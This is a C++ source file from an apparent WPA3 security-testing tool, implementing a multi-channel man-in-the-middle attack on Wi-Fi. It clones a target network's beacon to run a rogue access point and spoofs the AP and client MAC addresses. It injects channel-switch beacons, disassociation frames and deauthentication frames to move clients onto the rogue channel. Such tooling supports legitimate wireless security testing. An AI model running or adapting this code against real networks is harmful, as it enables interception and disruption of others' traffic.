#include "attacks/mc_mitm/mc_mitm.h"

#include <chrono>
#include <cstring>
#include <utility>
#include <tins/tins.h>

#include "attacks/by_target/scan_AP.h"
#include "attacks/DoS_hard/dos_helpers.h"
#include "attacks/DoS_soft/channel_switch/channel_switch.h"
#include "attacks/mc_mitm/wifi_util.h"
#include "logger/error_log.h"
#include "logger/log.h"
#include "system/hw_capabilities.h"

namespace wpa3_tester{
using namespace std;
using namespace chrono;
using namespace Tins;

McMitm::McMitm(const ActorPtr &rogue_sta,
               const ActorPtr &rogue_ap,
               string ssid,
               const string &ap_mac,
               const string &client_mac,
               const bool only_to_mitm
)
    : rogue_sta(rogue_sta),
      rogue_ap(rogue_ap),
      nic_real_ap(AP_IFACE_PREFIX + rogue_sta["iface"]),
      nic_rogue_ap(AP_IFACE_PREFIX + rogue_ap["iface"]),
      ssid(std::move(ssid)),
        // TODO fallback to info from actors
      ap_mac(ap_mac),
      client_mac(client_mac),
      only_to_mitm(only_to_mitm){}

McMitm::~McMitm(){ stop(); }

void McMitm::send_csa_beacon(const int numpairs, const optional<HWAddress<6>> &target) const{
    const auto  beacon_copy = unique_ptr<Dot11Beacon>(beacon->clone());

    if(target.has_value()) beacon_copy->addr1(*target);

    for(int i = 0; i < numpairs; ++i){
        //FIXME
        const NetworkInterface iface(rogue_sta["iface"]);
        CSA_attack::send_CSA_beacon(ap_mac, iface, ssid, netconfig.real_channel,  netconfig.rogue_channel);

        // Intel firmware requires first receiving a CSA beacon with a count of 2 or higher,
        // followed by one with a value of 1. When starting with 1 it errors out.
        //TODO proč to nejde takhle? (asi jedno, ale bylo bylep39 vycházet z beacon_copy)
        /*auto csa2 = append_csa(*beacon_copy, netconfig.rogue_channel, 2);
        send_to_real(csa2);

        auto csa1 = append_csa(*beacon_copy, netconfig.rogue_channel, 1);
        send_to_real(csa1);*/

        this_thread::sleep_for(milliseconds(100)); //TODO from config
    }
    //log(LogLevel::INFO, "Injected {} CSA beacon pairs (moving stations to channel {})", numpairs, netconfig.rogue_channel);
}

void McMitm::send_disas(const HWAddress<6> &macaddr) const{
    Dot11Disassoc disas{};
    disas.addr1(macaddr);
    disas.addr2(ap_mac);
    disas.addr3(ap_mac);
    disas.reason_code(0);
    send_to_rogue(disas);
    log(LogLevel::INFO, "Rogue channel: injected Disassociation to " + macaddr.to_string());
}

void McMitm::queue_disas(const HWAddress<6> &macaddr){
    const bool already_queued = ranges::any_of(disas_queue,
        [&](const auto &entry){ return entry.second == macaddr; });
    if(already_queued) return;

    const auto sched_time = steady_clock::now() + milliseconds(500);
    disas_queue.emplace_back(sched_time, macaddr);
    ranges::sort(disas_queue); // sort by time
}

void McMitm::try_channel_switch(const HWAddress<6> &macaddr){
    send_csa_beacon();
    queue_disas(macaddr);
}

void McMitm::send_deauth_as_ap() const{
    Dot11Deauthentication deauth;
    deauth.addr1(client_mac);
    deauth.addr2(ap_mac);
    deauth.addr3(ap_mac);
    deauth.reason_code(3);

    RadioTap rt;
    rt.inner_pdu(deauth);
    send_to_real(rt);
}

bool McMitm::should_check_rogue_beacons() const{
    // With some network cards, beacons generated by Linux are reflected back in monitor mode.
    // On other devices that's not done. Monitor mode is a mess.
    static const std::unordered_set<std::string> affected_drivers = {"ath9k_htc"};

    try{
        return affected_drivers.contains(rogue_ap->get_driver_name());
    } catch(const config_err &){
        return false;
    }
}

void McMitm::configure_interfaces(){
    log(LogLevel::INFO, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script");
    log(LogLevel::INFO,
        "Note: keep >1 meter between interfaces. Else packet delivery is unreliable & target may disconnect");

    rogue_sta->run({"iw", "dev", nic_real_ap, "del"});
    rogue_ap->run({"iw", "dev", nic_rogue_ap, "del"});
}

void McMitm::setup_real_AP_RSN_frames(){

    attack_scan::ScanAP scan_ap{};
    scan_ap.bssid = ap_mac.to_string();

    rogue_sta->set_iface_up();
    rogue_sta->set_channel(netconfig.real_channel);


    // get real AP beacon
    beacon = attack_scan::RSN_scan(rogue_sta["iface"], 20, scan_ap); //TODO hardcoded tscan_timeout
    if(!beacon){
        log(LogLevel::ERROR,
            "No beacon received of network <{}>. Is monitor mode working? Did you enter the correct SSID?", ssid);
        return;
    }

    log(LogLevel::INFO, "Monitor mode: using {} on real channel and {} on rogue channel.",
        rogue_sta["iface"], rogue_ap["iface"]);


    //if(netconfig.real_channel > 13) log(LogLevel::WARNING, "Attack not yet tested against 5 GHz networks.");
    //netconfig.find_rogue_channel(); //TODO

    // Get a probe response for fast replying
    if(auto *ch_ie = beacon->search_option(Dot11ManagementFrame::DS_SET))
        const_cast<uint8_t *>(ch_ie->data_ptr())[0] = netconfig.rogue_channel;
    probe_resp = std::make_unique<Dot11ProbeResponse>(beacon_to_probe_resp(*beacon, netconfig.rogue_channel));
    log(LogLevel::INFO, "Target network {} detected on channel ", ap_mac.to_string(), netconfig.real_channel);

}

void McMitm::run(RunStatus &rs, const int timeout_sec){
    const bool check_rogue_beacons = should_check_rogue_beacons();

    configure_interfaces();
    setup_real_AP_RSN_frames();
    log(LogLevel::INFO, "Will use {} to create rogue AP on channel {}", nic_rogue_ap, netconfig.rogue_channel);

    // Now that we know the AP channel, put the monitor interface in active ACK mode
    // for ACK back to AP

    //FIXME set_monitor_active ničí channel ()
    // const bool start_nic_real_ap = !hw_capabilities::set_monitor_active(rogue_sta["iface"], netconfig.real_channel);
    const bool start_nic_real_ap = true;
    if(start_nic_real_ap){
        rogue_sta->set_mac_address(client_mac.to_string());
        start_ap(rs, nic_real_ap, rogue_sta, netconfig.real_channel, *beacon, client_mac.to_string());
    } else{
        hw_capabilities::set_iface_down(nic_real_ap, rogue_sta->str_con.at("netns"));
        rogue_sta->set_mac_address(client_mac.to_string());
        hw_capabilities::run_cmd({"iw", rogue_sta["iface"], "set", "monitor", "active"}, rogue_sta->str_con.at("netns"));
        this_thread::sleep_for(seconds(15));
        rogue_sta->run({"iw", "dev", rogue_sta["iface"], "set", "channel", to_string(netconfig.real_channel)});
    }
    rogue_sta->set_iface_up();
    rogue_sta->run({"iw", "dev", rogue_sta["iface"], "set", "channel", to_string(netconfig.real_channel)});

    string bpf = "(wlan addr1 " + ap_mac.to_string() + ") or (wlan addr2 " + ap_mac.to_string() + ")";
    bpf += " or (wlan addr1 " + client_mac.to_string() + ") or (wlan addr2 " + client_mac.to_string() + ")";
    bpf = "(wlan type data or wlan type mgt) and (" + bpf + ")";

    sock_real = make_unique<MonitorSocket>(rogue_sta["iface"]);
    sock_real->set_filter(bpf);

    // set up the rogue AP and interfaces
    log(LogLevel::INFO, "Setting MAC address of {} to {}", nic_rogue_ap, ap_mac.to_string());
    rogue_ap->set_iface_up();
    rogue_ap->set_mac_address(ap_mac.to_string());
    // Set up a rogue AP that clones the target network -> ACK back to client
    start_ap(rs, nic_rogue_ap, rogue_ap, netconfig.rogue_channel, *beacon, ap_mac.to_string());
    //hw_capabilities::run_cmd({"iw", "dev", nic_real_ap, "station", "add", client_mac.to_string()}, rogue_sta->str_con.at("netns"), false);

    sock_rogue = make_unique<MonitorSocket>(rogue_ap["iface"]);
    sock_rogue->set_filter(bpf);

    log(LogLevel::INFO, "Giving the rogue AP one second to initialize ...");
    std::this_thread::sleep_for(seconds(1));

    // first disconnect
    send_csa_beacon(4);

    /* only for non MFP requests
    Dot11Deauthentication deauth{};
    deauth.addr1(HWAddress<6>::broadcast);
    deauth.addr2(ap_mac);
    deauth.addr3(ap_mac);
    deauth.reason_code(3);
    send_to_real(deauth);*/

    // monitoring both channels and performing needed actions
    last_real_beacon  = steady_clock::now();
    last_rogue_beacon = steady_clock::now();
    auto next_beacon  = steady_clock::now() + milliseconds(10);
    const auto start_time = steady_clock::now();

    while (!stop_mitm) {
        if (timeout_sec > 0 && steady_clock::now() > start_time + seconds(timeout_sec)) {
            log(LogLevel::INFO, "McMitm timeout reached, stopping.");
            break;
        }

        // Wait up to 100ms for data on either socket — mirrors Python select(..., 0.1)
        const int fd_real  = pcap_get_selectable_fd(sock_real->get_pcap_handle());
        const int fd_rogue = pcap_get_selectable_fd(sock_rogue->get_pcap_handle());

        //log(LogLevel::DEBUG, "fd_real={} fd_rogue={}", fd_real, fd_rogue);
        if(fd_real < 0 || fd_rogue < 0)
            log(LogLevel::ERROR, "pcap_get_selectable_fd failed: fd_real={} fd_rogue={}", fd_real, fd_rogue);

        const int max_fd   = std::max(fd_real, fd_rogue) + 1;

        fd_set read_fds;
        FD_ZERO(&read_fds);
        FD_SET(fd_real,  &read_fds);
        FD_SET(fd_rogue, &read_fds);

        timeval tv{0, 100'000}; // 100ms
        select(max_fd, &read_fds, nullptr, nullptr, &tv);

        if (FD_ISSET(fd_real,  &read_fds)){
            while(auto recv_res = sock_real->recv()) handle_rx_real_chan(std::move(recv_res.pdu), recv_res.raw);
        }
        if (FD_ISSET(fd_rogue, &read_fds)){
            while(auto recv_res = sock_rogue->recv()) handle_rx_rogue_chan(std::move(recv_res.pdu), recv_res.raw);
        }
        while (!disas_queue.empty() && disas_queue.front().first <= steady_clock::now()) {
            send_disas(disas_queue.front().second);
            disas_queue.erase(disas_queue.begin());
        }

        if (next_beacon <= steady_clock::now()) {
            const bool client_associated = clients.contains(client_mac) &&
                    clients.at(client_mac)->state >= ClientState::GotMitm;
            if(!client_associated)
                send_csa_beacon(1);
            next_beacon += milliseconds(100);
        }

        if (last_real_beacon + seconds(2) < steady_clock::now()) {
            log(LogLevel::WARNING, "WARNING: Didn't receive beacon from real AP for two seconds");
            last_real_beacon = steady_clock::now();
        }

        if (check_rogue_beacons && last_rogue_beacon + seconds(2) < steady_clock::now()) {
            log(LogLevel::WARNING, "WARNING: Didn't receive beacon from rogue AP for two seconds");
            last_rogue_beacon = steady_clock::now();
        }
    }
}

void McMitm::stop(){
    log(LogLevel::INFO, "Cleaning up MitM...");
    stop_ap(nic_real_ap, nullopt);
    stop_ap(nic_rogue_ap, nullopt);
    sock_real.reset();
    sock_rogue.reset();
}

void McMitm::patch_channel_raw(vector<uint8_t> &beacon_raw, const uint8_t channel){
    if(beacon_raw.size() < 4) return;

    const uint16_t old_rt_len = beacon_raw[2] | (beacon_raw[3] << 8);
    const long header_fixed = old_rt_len + 24 + 12;
    vector new_raw(beacon_raw.begin(), beacon_raw.begin() + header_fixed);

    size_t effective_size = beacon_raw.size();
    if(dos_helpers::check_fcs_present(beacon_raw.data(), beacon_raw.size())){
        effective_size -= 4;
    }

    size_t pos = header_fixed; // Tag parsing
    while(pos + 2 <= effective_size){
        const uint8_t id = beacon_raw[pos];
        const uint8_t len = beacon_raw[pos + 1];

        if(pos + 2 + len > effective_size) break;

        if(id == Dot11::DS_SET && len == 1){
            beacon_raw[pos + 2] = channel;
        } else if(id == Dot11::HT_OPERATION && len >= 1){
            beacon_raw[pos + 2] = channel;
        }
        pos += 2 + len;
    }

}

ClientState *McMitm::find_client(const string &mac){
    const auto it = clients.find(mac);
    return it != clients.end() ? it->second.get() : nullptr;
}
}
